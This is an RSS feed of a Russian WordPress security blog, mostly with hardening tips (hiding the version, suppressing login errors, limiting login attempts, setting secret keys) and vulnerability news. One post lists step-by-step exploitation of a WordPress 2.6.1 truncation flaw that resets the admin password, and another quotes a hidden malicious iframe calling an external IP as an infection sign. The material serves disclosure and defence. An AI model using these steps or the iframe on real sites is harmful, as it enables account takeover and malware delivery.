<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Безопасность WordPress блогов &#187; Безопасность</title>
	<atom:link href="http://wp-guard.com/category/bezopasnost/feed/" rel="self" type="application/rss+xml" />
	<link>http://wp-guard.com</link>
	<description>Как сделать ваш WordPress блог безопасным</description>
	<lastBuildDate>Fri, 28 Oct 2011 16:57:37 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Обнаружен веб-сервис, позволяющий автоматизировать процесс взлома паролей WordPress</title>
		<link>http://wp-guard.com/obnaruzhen-veb-servis-pozvolyayushhij-avtomatizirovat-process-vzloma-parolej-wordpress/</link>
		<comments>http://wp-guard.com/obnaruzhen-veb-servis-pozvolyayushhij-avtomatizirovat-process-vzloma-parolej-wordpress/#comments</comments>
		<pubDate>Sat, 05 Dec 2009 07:02:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[Пароли]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=59</guid>
		<description><![CDATA[Хакеры разработали схему распределенного взлома паролей администраторов к аккаунтам WordPress, применение которой не сулит ничего хорошего тем блогам, чьи владельцы используют небезопасные пароли. PHP-скрипты, расположенные на виртуальном сервере, запускают на целевые сайты брутфорс-атаки, позволяя одновременно подбирать пароли сразу ко многим ресурсам. Результаты таких атак записываются в специальную базу данных. SANS Internet Storm Centre отмечает, что<a href="http://wp-guard.com/obnaruzhen-veb-servis-pozvolyayushhij-avtomatizirovat-process-vzloma-parolej-wordpress/"> читать далее ..</a>]]></description>
			<content:encoded><![CDATA[<p>Хакеры разработали схему распределенного взлома паролей администраторов к аккаунтам WordPress, применение которой не сулит ничего хорошего тем блогам, чьи владельцы используют небезопасные пароли.</p>
<p>PHP-скрипты, расположенные на виртуальном сервере, запускают на целевые сайты брутфорс-атаки, позволяя одновременно подбирать пароли сразу ко многим ресурсам. Результаты таких атак записываются в специальную базу данных.</p>
<p>SANS Internet Storm Centre отмечает, что брутфорс-атаки на WordPress – это весьма распространенное явление. Тем не менее, специалисты Центра подчеркивают, что появление распределенных сервисов для взлома блогов выводит эту проблему на новый уровень.</p>
<p>“Несмотря на то, что данный конкретный образец достаточно прост, сила, стоящая за связкой скрипта и базы данных MySQL, позволяет нападающим осуществлять атаку не только по названиям сайтов, но и по испробованным паролям”, - пишет в сетевом дневнике организации ее эксперт Бойян Здрня.</p>
<p>Администраторам блогов во избежание взлома рекомендовано использовать трудные для подбора пароли и ограничить доступ к административной части по IP-адресам.</p>
<img src="http://wp-guard.com/?ak_action=api_record_view&id=59&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/obnaruzhen-veb-servis-pozvolyayushhij-avtomatizirovat-process-vzloma-parolej-wordpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Скрываем версию WordPress</title>
		<link>http://wp-guard.com/skryvaem-versiyu-wordpress/</link>
		<comments>http://wp-guard.com/skryvaem-versiyu-wordpress/#comments</comments>
		<pubDate>Fri, 23 Oct 2009 13:18:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=54</guid>
		<description><![CDATA[Для повышения безопасности блога, часто рекомендуют отключить отображение версии WordPress. Инструкций как это сделать, огромное множество и все они могут использовать разные методы для отключения отображения версии, но самый просто и правильный вариант, это добавить в файл functions.php который находится в папке шаблона вашего блога, следующую строчку: remove_action('wp_head', 'wp_generator'); Эта строчка отключает отображение версии WordPress,<a href="http://wp-guard.com/skryvaem-versiyu-wordpress/"> читать далее ..</a>]]></description>
			<content:encoded><![CDATA[<p>Для повышения безопасности блога, часто рекомендуют отключить отображение версии WordPress. Инструкций как это сделать, огромное множество и все они могут использовать разные методы для отключения отображения версии, но самый просто и правильный вариант, это добавить в файл functions.php который находится в папке шаблона вашего блога, следующую строчку:</p>
<pre name="code" class="php">
remove_action('wp_head', 'wp_generator');
</pre>
<p>Эта строчка отключает отображение версии WordPress, для вашего блога. Таким образом злоумышленникам будет немного сложнее провести атаку на ваш ресурс.</p>
<img src="http://wp-guard.com/?ak_action=api_record_view&id=54&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/skryvaem-versiyu-wordpress/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Скрываем сообщение о ошибке при логине.</title>
		<link>http://wp-guard.com/skryvaem-soobshhenie-o-oshibke-pri-logine/</link>
		<comments>http://wp-guard.com/skryvaem-soobshhenie-o-oshibke-pri-logine/#comments</comments>
		<pubDate>Thu, 22 Oct 2009 12:38:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[Логин]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=51</guid>
		<description><![CDATA[Дабы усложнить перебор паролей к вашему WordPress-блогу, можно попросить его не показывать сообщения об ошибке при попытках неправильного входа в блог, таким образом злоумышленник не увидит в чем суть проблемы, несуществующий пользователь или неправильный пароль. Для этого, необходимо отредактировать файл functions.php и вставить следующую строчку: add_filter('login_errors',create_function('$a', "return null;"));]]></description>
			<content:encoded><![CDATA[<p>Дабы усложнить перебор паролей к вашему WordPress-блогу, можно попросить его не показывать сообщения об ошибке при попытках неправильного входа в блог, таким образом злоумышленник не увидит в чем суть проблемы, несуществующий пользователь или неправильный пароль.</p>
<p>Для этого, необходимо отредактировать файл functions.php и вставить следующую строчку:</p>
<pre name="code" class="php">
add_filter('login_errors',create_function('$a', "return null;"));
</pre>
<img src="http://wp-guard.com/?ak_action=api_record_view&id=51&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/skryvaem-soobshhenie-o-oshibke-pri-logine/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Защита от перебора паролей в WordPress</title>
		<link>http://wp-guard.com/zashhita-ot-perebora-parolej-v-wordpress/</link>
		<comments>http://wp-guard.com/zashhita-ot-perebora-parolej-v-wordpress/#comments</comments>
		<pubDate>Tue, 31 Mar 2009 06:41:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[Плагины]]></category>
		<category><![CDATA[Bruteforce]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[Пароли]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=41</guid>
		<description><![CDATA[Для того, чтобы обезопасить свой блог, от взлома путем перебора паролей, необходимо установить ограничение количества неправильных логинов, в этом случае бот или человек, который задумает подобрать пароль к Вашему блогу, после определенного количества неправильных логинов, будет забанен на определенное время. Сделать это можно очень легко, достаточно просто скачать и установить WordPress плагин Limit Login Attempts.<a href="http://wp-guard.com/zashhita-ot-perebora-parolej-v-wordpress/"> читать далее ..</a>]]></description>
			<content:encoded><![CDATA[<p>Для того, чтобы обезопасить свой блог, от взлома путем перебора паролей, необходимо установить ограничение количества неправильных логинов, в этом случае бот или человек, который задумает подобрать пароль к Вашему блогу, после определенного количества неправильных логинов, будет забанен на определенное время.</p>
<p>Сделать это можно очень легко, достаточно просто скачать и установить <noindex><a rel="nofollow" href="http://wp-guard.com/go/http://wordpress.org/extend/plugins/limit-login-attempts/">WordPress плагин Limit Login Attempts</a></noindex>. (<a href="http://blogproblog.com/kak-ustanovit-wordpress-plagin/">как установить плагин</a>)</p>
<ul>
<li>Плагин позволяет настроить количество неправильных логинов, до того как забанить пользователя.</li>
<li>Плагин показывает пользователю сколько попыток осталось</li>
<li>Плагин показывает пользователю сколько времени осталось до следующей возможности логина</li>
<li>Отправляет уведомление администратору о том, что были попытки подобрать пароль</li>
</ul>
<p>Устанавливайте плагин и делайте ваш WordPress блог более безопасным.</p>
<img src="http://wp-guard.com/?ak_action=api_record_view&id=41&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/zashhita-ot-perebora-parolej-v-wordpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Уязвимости в плагинах Media Holder и e-Commerce</title>
		<link>http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/</link>
		<comments>http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/#comments</comments>
		<pubDate>Mon, 03 Nov 2008 09:38:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[Плагины]]></category>
		<category><![CDATA[Уязвимости]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=31</guid>
		<description><![CDATA[Найдены уязвимости в WordPress-плагинах Media Holder и E-Commerce. На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога. Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп. Плагин e-Commerce используется для создания интернет-магазина на основе вашего WordPress-блога. Уязвимость в плагине WordPress Media Holder связана с ошибкой<a href="http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/"> читать далее ..</a>]]></description>
			<content:encoded><![CDATA[<p>Найдены уязвимости в WordPress-плагинах Media Holder и E-Commerce.</p>
<p>На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога.</p>
<p>Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп.</p>
<p>Плагин e-Commerce используется для создания интернет-магазина на основе вашего WordPress-блога.</p>
<p>Уязвимость в плагине WordPress Media Holder связана с ошибкой обработки данных при работе с базой MySQL вашего блога. Эксплоит можно просмотреть <noindex><a rel="nofollow" title="Безопаность WordPress блогов" href="http://wp-guard.com/go/http://www.milw0rm.com/exploits/6842">здесь</a></noindex>.</p>
<p>Уязвимость в плагине WordPress e-Commerce связана с неправильной обработкой загружаемых на сервер файлов. Эксплоит можно посмотреть <noindex><a rel="nofollow" title="Безопаность WordPress блогов" href="http://wp-guard.com/go/http://www.milw0rm.com/exploits/6867">здесь</a></noindex>.</p>
<p>Если вы используете один из этих плагинов в своем блоге, отключите их до тех пор, пока появится обновление, которое исправляет данные уязвимости.</p>
<p>Для борьбы с уязвимостями которые используют базу данных MySQL в WordPress-блоге, возможно будет полезно изменение префикса таблиц, при установке блога, либо если блог уже установлен со стандартным префиксом wp_ воспользуйтесь плагином, который <a title="Плагин WordPress для изменения префикса таблиц" href="http://blogproblog.com/menyaem-prefiks-tablic-v-wordpress-bloge/">изменяет префиксы таблиц</a>, в уже существующем блоге.</p>
<img src="http://wp-guard.com/?ak_action=api_record_view&id=31&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Уязвимость усечения данных в SQL WordPress 2.6.1</title>
		<link>http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/</link>
		<comments>http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/#comments</comments>
		<pubDate>Mon, 08 Sep 2008 08:00:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[Уязвимости]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[Пароли]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=27</guid>
		<description><![CDATA[Найдена новая уязвимость в WordPress 2.6.1 которая заключается в ошибке усечения данных в базе SQL. Идем по ссылке server.com/wp-login.php?action=register Регистрируемся как пользователь "admin                         x" и Ваш email Логин выглядит как admin[55 пробелов]х После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора.<a href="http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/"> читать далее ..</a>]]></description>
			<content:encoded><![CDATA[<p>Найдена новая уязвимость в <a title="Создание блога WordPress" href="http://blogproblog.com">WordPress</a> 2.6.1 которая заключается в ошибке усечения данных в базе SQL.</p>
<ol>
<li>Идем по ссылке server.com/wp-login.php?action=register</li>
<li>Регистрируемся как пользователь "admin                         x" и Ваш email</li>
<li>Логин выглядит как admin[55 пробелов]х</li>
<li>После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword</li>
<li>В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора.</li>
<li>Получаем письмо с ссылкой на сброс пароля, сбрасываем пароль администратора. Новый пароль прийдет на email, но правда уже не на Ваш, а на email <noindex><a rel="nofollow" href="http://wp-guard.com/go/http://www.artlebedev.ru">настоящего</a></noindex> администратора блога.</li>
</ol>
<img src="http://wp-guard.com/?ak_action=api_record_view&id=27&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Секретные ключи в WordPress 2.6</title>
		<link>http://wp-guard.com/sekretnye-klyuchi-v-wordpress-26/</link>
		<comments>http://wp-guard.com/sekretnye-klyuchi-v-wordpress-26/#comments</comments>
		<pubDate>Mon, 28 Jul 2008 09:28:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[Конфигурация]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=22</guid>
		<description><![CDATA[Продолжая тему о уязвимости секретного ключа в файле конфигурации WordPress, хочу обратить ваше внимание на то, что в новой версии WordPress 2.6, кроме строчки “SECRET_KEY“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении WordPress блога. Строчки эти выглядят вот так: define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.<a href="http://wp-guard.com/sekretnye-klyuchi-v-wordpress-26/"> читать далее ..</a>]]></description>
			<content:encoded><![CDATA[<p>Продолжая тему о <a href="http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/">уязвимости секретного ключа</a> в файле конфигурации WordPress, хочу обратить ваше внимание на то, что в новой версии WordPress 2.6, кроме строчки “<strong>SECRET_KEY</strong>“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении <a title="Создание и поддержка WordPress блогов" href="http://blogproblog.com">WordPress блога</a>.</p>
<p>Строчки эти выглядят вот так:</p>
<blockquote><p>define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.<br />
define('SECURE_AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.<br />
define('LOGGED_IN_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.</p></blockquote>
<p>Значение каждого параметра должно быть уникальным, сложным и длинным. Что бы не утруждать себя выдумыванием этих значений, вы можете воспользоваться специальным <noindex><a rel="nofollow" href="http://wp-guard.com/go/http://api.wordpress.org/secret-key/1.1/">сервисом WordPress</a></noindex>, который генерирует эти три строчки для вашего файла конфигурации.</p>
<p>Просто откройте эту <noindex><a rel="nofollow" href="http://wp-guard.com/go/http://api.wordpress.org/secret-key/1.1/">страничку</a></noindex>, и скопируйте код в файл конфигурации вашего WordPress блога <strong>wp-config.php</strong>, вот и все, теперь проблема с уникальными ключами вашего блога решена и ваш блог стал еще более защищённым.</p>
<p><tt>Блоговодство:</tt></p>
<ul>
<li><noindex><a rel="nofollow" href="http://wp-guard.com/go/http://tods-blog.com.ua/seo-smo/smo/traffic-from-feedmares-blogupp/">Сервисы для привлечения траффика на блог</a></noindex></li>
<li><noindex><a rel="nofollow" href="http://wp-guard.com/go/http://bizdesign.com.ua/idealnyjj-sajjt-ili-otrezvlyaem-naivnykh%E2%80%A6/">Про идеальный сайт</a></noindex></li>
<li><noindex><a rel="nofollow" href="http://wp-guard.com/go/http://www.profithunter.ru/optimizaciya/vyyavlenie-dublirovannogo-kontenta-na-sajte/">Выявление дублированного контента на сайте</a></noindex></li>
</ul>
<img src="http://wp-guard.com/?ak_action=api_record_view&id=22&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/sekretnye-klyuchi-v-wordpress-26/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Внимание вирус!</title>
		<link>http://wp-guard.com/badware/</link>
		<comments>http://wp-guard.com/badware/#comments</comments>
		<pubDate>Sun, 27 Jul 2008 18:03:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[Информация]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[Вирусы]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=20</guid>
		<description><![CDATA[Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется Google как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода. &#60;!-- Traffic Statistics --&#62; &#60;iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0&#62;&#60;/iframe&#62; &#60;!-- End Traffic Statistics --&#62;<a href="http://wp-guard.com/badware/"> читать далее ..</a>]]></description>
			<content:encoded><![CDATA[<p>Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется <noindex><a rel="nofollow" href="http://wp-guard.com/go/http://www.google.com">Google</a></noindex> как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода.</p>
<p>&lt;!-- Traffic Statistics --&gt; &lt;iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0&gt;&lt;/iframe&gt; &lt;!-- End Traffic Statistics --&gt;</p>
<p>Если у вас нашлось что-то подобное, ознакомьтесь с этим <a href="http://wp-guard.com/ne-soxranyajte-paroli-v-ftp-programmax/">постом</a>.</p>
<img src="http://wp-guard.com/?ak_action=api_record_view&id=20&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/badware/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>WordPress 2.6 &#8211; еще больше безопасности</title>
		<link>http://wp-guard.com/wordpress-26-more-secure/</link>
		<comments>http://wp-guard.com/wordpress-26-more-secure/#comments</comments>
		<pubDate>Tue, 22 Jul 2008 06:18:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[Обновления]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[Wordpress 2.6]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=16</guid>
		<description><![CDATA[Вышла новая версия лучшего движка для блогов - WordPress 2.6. В новой версии исправлено очень много ошибок и уязвимостей, а также проделано много работы для повышения безопасности блога. Теперь после установки WordPress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках.<a href="http://wp-guard.com/wordpress-26-more-secure/"> читать далее ..</a>]]></description>
			<content:encoded><![CDATA[<p>Вышла новая версия лучшего движка для блогов - <a title="Создать блог WordPress" href="http://blogproblog.com">WordPress</a> 2.6. В новой версии исправлено очень много ошибок и уязвимостей, а также проделано много работы для повышения безопасности блога.</p>
<ul>
<li>Теперь после установки WordPress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках. Теоритически возможность атаки блога через этот протокол существует, а блоггеров которые активно пользуются этим протоколом не так уж и много, поэтому данная мера должна немного повысить безопасность вашего блога.</li>
<li>Полная поддержка работы по протоколу шифрования SSL. Никаких плагинов и настроек делать не нужно, если возможно то WordPress сам будет пытаться работать через зашифрованное подключение SSL.</li>
<li>Улучшения работы с базой данных и хранением сессий пользователей.</li>
</ul>
<p>Помимо всего этого, обновление до версии WordPress 2.6 исправляет 194 ошибки, которые небыли исправлены в 2.5.1.</p>
<p>Лично я уже обновил все свои <noindex><a rel="nofollow" title="Советы блоггерам - лучшее про блоги" href="http://wp-guard.com/go/http://topproblog.com">блоги</a></noindex> до версии 2.6, хотя на многих сайтах рекомендуют подождать немного, что бы посмотреть как будет работать новая версия. С уверенностью заявляю, пока что новая версия WordPress 2.6 на моих ресурсах работает отлично.</p>
<p>Скачать русскую версию WordPress 2.6 вы можете на официальном <noindex><a rel="nofollow" title="Скачать WordPress" href="http://wp-guard.com/go/http://ru.wordpress.org/">сайте WordPress</a></noindex>.</p>
<img src="http://wp-guard.com/?ak_action=api_record_view&id=16&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/wordpress-26-more-secure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Уязвимость секретного ключа в wordpress 2.5</title>
		<link>http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/</link>
		<comments>http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/#comments</comments>
		<pubDate>Wed, 11 Jun 2008 12:52:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[Уязвимости]]></category>
		<category><![CDATA[Wordpress 2.5]]></category>
		<category><![CDATA[Пароли]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=14</guid>
		<description><![CDATA[Очень важно при обновлении или установке WordPress обратить внимание на параметр "SECRET_KEY", с этим параметром связана безопасность паролей в вашем блоге. В новых версиях WordPress этот ключ стали использовать для усиления алгоритма криптования паролей md5, поэтому очень важно иметь в качестве этого параметра какую-то длинную строчку с различными символами, дабы усложнить процесс расшифровки вашего пароля,<a href="http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/"> читать далее ..</a>]]></description>
			<content:encoded><![CDATA[<p>Очень важно при обновлении или установке <a title="Техническая поддержка WordPress блогов" href="http://blogproblog.com">WordPress</a> обратить внимание на параметр "<strong>SECRET_KEY</strong>", с этим параметром связана безопасность паролей в вашем блоге.</p>
<p>В новых версиях WordPress этот ключ стали использовать для усиления алгоритма криптования паролей md5, поэтому очень важно иметь в качестве этого параметра какую-то длинную строчку с различными символами, дабы усложнить процесс расшифровки вашего пароля, если не дай то бог, злоумышленник получил доступ к зашифрованным паролям.</p>
<p>При установке или обновлении блога, WordPress изначально не предлагает изменить эту строчку и вообще о ней ничего не говорит, именно поэтому у большинства блоггеров этот параметр выглядит примерно вот так: "<strong>put your unique phrase here</strong>".</p>
<p>Если вам лениво придумывать длинный набор символов, для этого параметра, воспользуйтесь <noindex><a rel="nofollow" href="http://wp-guard.com/go/https://www.grc.com/passwords.htm">онлайн сервисом</a></noindex>, который сгенерирует для вас подходящую строчку. После этого, откройте файл wp-config.php и измените стандартную строку "<strong>put your unique phrase here</strong>" на строчку которую вы сгенерировали на сайте. Сохраните изменения и закачайте файл на сервер.</p>
<img src="http://wp-guard.com/?ak_action=api_record_view&id=14&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>

